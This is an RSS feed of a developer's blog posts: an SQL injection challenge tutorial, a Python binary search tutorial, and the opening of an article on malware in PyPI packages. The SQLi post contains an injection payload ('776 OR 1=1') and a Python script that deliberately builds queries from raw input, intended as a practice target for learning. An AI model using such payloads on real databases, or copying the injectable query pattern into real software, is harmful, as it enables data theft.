<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Seraph★776</title>
    <description>The latest articles on DEV Community by Seraph★776 (@seraph776).</description>
    <link>https://dev.to/seraph776</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F638344%2Fc6211081-480e-49dc-8152-9b30b1e66b45.jpg</url>
      <title>DEV Community: Seraph★776</title>
      <link>https://dev.to/seraph776</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/seraph776"/>
    <language>en</language>
    <item>
      <title>SQL Injection Hacker Challenge</title>
      <dc:creator>Seraph★776</dc:creator>
      <pubDate>Mon, 29 Aug 2022 23:47:00 +0000</pubDate>
      <link>https://dev.to/seraph776/sql-injection-hacker-challenge-348j</link>
      <guid>https://dev.to/seraph776/sql-injection-hacker-challenge-348j</guid>
      <description>&lt;h2&gt;
  
  
  💡 Overview
&lt;/h2&gt;

&lt;p&gt;A &lt;code&gt;SQL injection&lt;/code&gt; (&lt;code&gt;SQLi&lt;/code&gt;) is a type of cybersecurity attack that targets data-driven applications by inserting or &lt;code&gt;"injecting"&lt;/code&gt; malicious SQL statements in the input field of a web page. A successful &lt;code&gt;SQLi&lt;/code&gt; can allow an attacker to &lt;code&gt;read&lt;/code&gt; sensitive data from the database, &lt;code&gt;modify&lt;/code&gt; database data (Insert/Update/Delete), &lt;code&gt;execute&lt;/code&gt; administration operations on the database, or even gain &lt;code&gt;root&lt;/code&gt; access to the system itself. &lt;strong&gt;The SQLi Hacker Challenge&lt;/strong&gt; is an chance for you to conduct a &lt;code&gt;SQLi&lt;/code&gt; attack on a mock database that was designed for this challenge. If successful, you’ll have another opportunity to answer some fun Bonus Questions.&lt;/p&gt;

&lt;p&gt;Before we begin, let's go over an example of &lt;code&gt;SQLi&lt;/code&gt; attack.&lt;/p&gt;

&lt;h3&gt;
  
  
  SQLi example
&lt;/h3&gt;

&lt;p&gt;Look at the following example which creates a &lt;code&gt;SELECT&lt;/code&gt; statement by adding a variable (&lt;code&gt;user_id&lt;/code&gt;) to the end of it. The variable is fetched from the &lt;code&gt;input()&lt;/code&gt; function.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;user_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;input&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"User ID: "&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;SQL_statement&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s"&gt;"SELECT * FROM Users WHERE user_id = &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The purpose of the code is to create a &lt;code&gt;SQL&lt;/code&gt; statement to select a &lt;code&gt;user&lt;/code&gt;, with a given &lt;code&gt;user_id&lt;/code&gt;. If there are no security measures in place then a user can enter erroneous data into the input field such as:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;User&lt;/span&gt; &lt;span class="n"&gt;Id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;776&lt;/span&gt; &lt;span class="n"&gt;OR&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This would create the following SQL statement:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;SELECT * FROM Users WHERE user_id = 776 OR 1=1;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The above SQL statement is valid and will return ALL rows from the &lt;code&gt;"Users"&lt;/code&gt; table, since &lt;code&gt;OR 1=1&lt;/code&gt; is always &lt;code&gt;TRUE&lt;/code&gt;. If the &lt;code&gt;"Users"&lt;/code&gt; table contains &lt;code&gt;usernames&lt;/code&gt; and &lt;code&gt;passwords&lt;/code&gt; then a hacker would get access to all the usernames and passwords in a database, by simply inserting &lt;code&gt;776 OR 1=1&lt;/code&gt; into the input field.&lt;/p&gt;

&lt;h2&gt;
  
  
  SQLi Hacker Challenge
&lt;/h2&gt;

&lt;p&gt;Now that you have a basic understanding of how a &lt;code&gt;SQLi&lt;/code&gt; works, lets try the &lt;strong&gt;SQLi Hacker Challenge.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Task
&lt;/h3&gt;

&lt;p&gt;Your task is to execute a successful &lt;code&gt;SQLi&lt;/code&gt; attack on a mock database that was designed for this challenge, and to view all contents in.&lt;/p&gt;

&lt;h3&gt;
  
  
  Database Design
&lt;/h3&gt;

&lt;p&gt;The database consists of one &lt;code&gt;table&lt;/code&gt;, and the following three &lt;code&gt;columns&lt;/code&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;id&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;username&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;password&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Instructions
&lt;/h3&gt;

&lt;p&gt;Run the following Python script on your local machine, and you will be prompted to &lt;code&gt;"Enter your SQL Injection."&lt;/code&gt;. Keep entering input until you successfully achieve a &lt;code&gt;SQLi&lt;/code&gt; attack!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;#!/usr/bin/env python3
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sqlite3&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;requests&lt;/span&gt;

&lt;span class="c1"&gt;# SQL statements:
&lt;/span&gt;&lt;span class="n"&gt;CREATE_USERS_TABLE&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"CREATE TABLE IF NOT EXISTS usernames (id INTEGER PRIMARY KEY, username TEXT, password TEXT);"&lt;/span&gt;
&lt;span class="n"&gt;INSERT_USER_DATA&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"INSERT INTO usernames (username, password) VALUES (?, ?)"&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_userdata&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="s"&gt;"""Returns username, and password in tuple from online username.dat file."""&lt;/span&gt;
    &lt;span class="c1"&gt;# url to username and password file
&lt;/span&gt;    &lt;span class="n"&gt;URL&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"https://pastebin.com/raw/ih7szSSv"&lt;/span&gt;
    &lt;span class="n"&gt;raw&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;URL&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
    &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;raw&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;users&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;', '&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;','&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="n"&gt;passwords&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;', '&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;','&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;users&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;passwords&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt;


&lt;span class="c1"&gt;# Create database in memory
&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sqlite3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;connect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;":memory:"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="c1"&gt;# Get usernames and passwords
&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;get_userdata&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="c1"&gt;# Create table
&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CREATE_USERS_TABLE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="c1"&gt;# Insert username, passwords into database
&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;executemany&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;INSERT_USER_DATA&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user_data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;INJECTION&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;input&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Enter your SQL Injection:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;gt;  "&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;sql&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s"&gt;"SELECT * FROM usernames WHERE id = 776 &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;INJECTION&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;results&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sql&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;fetchall&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;results&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n\033&lt;/span&gt;&lt;span class="s"&gt;[92m"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s"&gt;"Good job, you did it!"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\033&lt;/span&gt;&lt;span class="s"&gt;[0m"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;row&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;results&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;row&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="n"&gt;sqlite3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;OperationalError&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n\033&lt;/span&gt;&lt;span class="s"&gt;[91m"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s"&gt;"Nope, try again!"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\033&lt;/span&gt;&lt;span class="s"&gt;[0m"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;pass&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Bonus Questions
&lt;/h2&gt;

&lt;p&gt;After dumping the database, try solving the following Bonus Questions.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Decrypt the administrator's password. &lt;strong&gt;Hint&lt;/strong&gt;: MD(&lt;code&gt;101&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;What 1995 &lt;code&gt;"crime/action/romance"&lt;/code&gt; movie did these &lt;code&gt;users&lt;/code&gt; play in? &lt;strong&gt;Hint&lt;/strong&gt;: &lt;em&gt;Solve the first bonus question&lt;/em&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The main purpose of this tutorial was to teach basic techniques on how to conduct a &lt;code&gt;SQLi&lt;/code&gt; attack. Hopefully you were able to successfully execute a &lt;code&gt;SQLi&lt;/code&gt; attack, and  solve all of the &lt;em&gt;Bonus Questions&lt;/em&gt;. If you want a better &lt;code&gt;SQLi&lt;/code&gt; graphic user interface then  check out the &lt;a href="https://www.hacksplaining.com/exercises/sql-injection"&gt;SQL Injection Lab hosted on Hacksplaining&lt;/a&gt;. Please leave your questions, concerns or comments below. Thanks for reading this post ~ Good luck and have fun!&lt;/p&gt;




&lt;p&gt;Code available at &lt;a href="https://github.com/seraph776/sql-injection-hacker-challenge"&gt;GitHub&lt;/a&gt;&lt;/p&gt;

</description>
      <category>python</category>
      <category>sql</category>
      <category>programming</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Python: Binary Search Algorithm 🔎</title>
      <dc:creator>Seraph★776</dc:creator>
      <pubDate>Sun, 21 Aug 2022 11:41:32 +0000</pubDate>
      <link>https://dev.to/seraph776/python-binary-search-algorithm-20n5</link>
      <guid>https://dev.to/seraph776/python-binary-search-algorithm-20n5</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;The purpose of this article is to explain the Binary Search algorithm and how it works. Then we’ll walk through an example of a binary search in Python so that you can learn how to write one your own. &lt;/p&gt;

&lt;h2&gt;
  
  
  What is Binary Search?
&lt;/h2&gt;

&lt;p&gt;A binary search is a search algorithm that finds the position of a target value within a sorted array.  It is the most efficient searching algorithm having a run-time complexity of &lt;em&gt;O (log2 N)&lt;/em&gt;. Binary search is faster than linear search except for small arrays. It is considered a Divide and Conquer algorithm. There are specialized data structures designed for fast searching, such as hash tables, that can be searched more efficiently than binary search. However, binary search can be used to solve a wider range of problems, such as finding the next-smallest or next-largest element in the array relative to the target even if it is absent from the array.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it works?
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;The binary search begins by comparing the &lt;code&gt;middle_index&lt;/code&gt; of the array with the &lt;code&gt;target_number&lt;/code&gt;. If the &lt;code&gt;target_number&lt;/code&gt; matches the &lt;code&gt;middle_index&lt;/code&gt;, then its position in the array is returned.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If it does not match, then the algorithm determines if the &lt;code&gt;target number&lt;/code&gt; is &lt;code&gt;greater than&lt;/code&gt; or &lt;code&gt;less than&lt;/code&gt; the &lt;code&gt;middle_index&lt;/code&gt;. Since the array is sorted, it determines if the target_number is in the left (&lt;code&gt;lower&lt;/code&gt;) half, or the right (&lt;code&gt;upper&lt;/code&gt;) half of the array.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The algorithm effectively &lt;code&gt;divided the problem in half&lt;/code&gt;. It “&lt;em&gt;rules out&lt;/em&gt;" one half of the array that it knows doesn't contain the target_number.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;It Repeat the same process&lt;/code&gt;, starting at the &lt;code&gt;middle_index&lt;/code&gt; on the new half-size array. This process repeats again and again, until the algorithm find the target_number or "&lt;em&gt;rules out&lt;/em&gt;" the whole set.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Implement a Binary Search in Python
&lt;/h2&gt;

&lt;p&gt;Let's take a look at how to implement a binary search  using Python. The pseudo-code below will help explain the steps taken for each line of code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pseudocode
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Define &lt;code&gt;low_index&lt;/code&gt; and &lt;code&gt;middle_index&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Start while loop.&lt;/li&gt;
&lt;li&gt;Define &lt;code&gt;middle_index&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;If &lt;code&gt;target_number&lt;/code&gt; equals &lt;code&gt;middle_index&lt;/code&gt;, then return &lt;code&gt;True&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;If &lt;code&gt;target_number&lt;/code&gt; is less than &lt;code&gt;middle_index&lt;/code&gt;
then &lt;code&gt;high_index&lt;/code&gt; becomes &lt;code&gt;middle_index - 1&lt;/code&gt;,
&lt;/li&gt;
&lt;li&gt;If &lt;code&gt;target_number&lt;/code&gt; is greater than &lt;code&gt;middle_index&lt;/code&gt;
then &lt;code&gt;low_index&lt;/code&gt; becomes &lt;code&gt;middle_index  + 1&lt;/code&gt;,
&lt;/li&gt;
&lt;li&gt;If &lt;code&gt;NO target_number&lt;/code&gt;, then return &lt;code&gt;False&lt;/code&gt;.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;binary_search&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;target_number&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="s"&gt;"""Binary Search Algorithm"""&lt;/span&gt;
    &lt;span class="c1"&gt;# 1. Define low_index &amp;amp; high_index:
&lt;/span&gt;    &lt;span class="n"&gt;low_index&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="n"&gt;high_index&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lst&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

    &lt;span class="c1"&gt;# 2. Start while loop:
&lt;/span&gt;    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="n"&gt;low_index&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;high_index&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# 3. Define middle_index:
&lt;/span&gt;        &lt;span class="n"&gt;middle_index&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;low_index&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;high_index&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;//&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;
        &lt;span class="c1"&gt;# 4. If target_number == middle_index, then return True:
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;target_number&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;lst&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;middle_index&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
        &lt;span class="c1"&gt;# 5. If target_number is less than middle_index,
&lt;/span&gt;        &lt;span class="c1"&gt;# then high_index becomes middle_index - 1:
&lt;/span&gt;        &lt;span class="k"&gt;elif&lt;/span&gt; &lt;span class="n"&gt;target_number&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;lst&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;middle_index&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
            &lt;span class="n"&gt;high_index&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;middle_index&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="c1"&gt;# 6. If target_number is greater than middle_index,
&lt;/span&gt;            &lt;span class="c1"&gt;# then the low_index-index becomes middle_index:
&lt;/span&gt;            &lt;span class="n"&gt;low_index&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;middle_index&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
    &lt;span class="c1"&gt;# 7. If NO target_number, then return False:
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;This article discussed how the Binary Search algorithm works and how to implement one using python. Hopefully you have a better understanding on how the algorithm works, and can write your own variation. If you found this article helpful or have any questions, please leave a comment.&lt;/p&gt;




&lt;p&gt;Code available at &lt;a href="https://github.com/seraph776/DevCommunity/tree/main/BinarySearchAlgorithm"&gt;GitHub&lt;/a&gt;&lt;/p&gt;

</description>
      <category>python</category>
      <category>programming</category>
      <category>algorithms</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Pip Install Malware?!</title>
      <dc:creator>Seraph★776</dc:creator>
      <pubDate>Fri, 05 Aug 2022 22:46:00 +0000</pubDate>
      <link>https://dev.to/seraph776/pip-install-malware-56km</link>
      <guid>https://dev.to/seraph776/pip-install-malware-56km</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;If you are a Python developer then you are aware of &lt;a href="https://pypi.org/project/pip/"&gt;pip&lt;/a&gt;. However, were you aware of the potential &lt;a href="https://www.darkreading.com/threat-intelligence/school-kid-uploads-ransomware-scripts-to-pypi-repository-as-fun-research-project"&gt;malware&lt;/a&gt; threat associated with Python's recommended package-management system? This article will discuss the security threats associated with pip and what you can do to protect yourself against them.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is PIP?
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Package Installer for Python&lt;/em&gt; or (pip) is the de facto and recommended package-management system written in Python and is used to install and manage software packages. It connects to an online repository of public packages, called the Python Package Index(&lt;code&gt;PyPI&lt;/code&gt;). For example, let's say you want to install the &lt;code&gt;request&lt;/code&gt; module. You would use the following syntax:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install request
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command will download the source code of the &lt;code&gt;request&lt;/code&gt; package and install it into your local Python environment, allowing you to utilize its functionality.&lt;/p&gt;

&lt;h2&gt;
  
  
  PIP's Vulnerabilities
&lt;/h2&gt;

&lt;p&gt;In general practice, Python developers will usually upload secure and ethical code to the PyPI repository. However, you would be surprised to know, there are no third-party checks on the code that is uploaded to PyPI. The only restriction is that once a package name exists, only the maintainer(s) can upload packages with that name. Meaning you can't submit a package using an already established name.&lt;/p&gt;

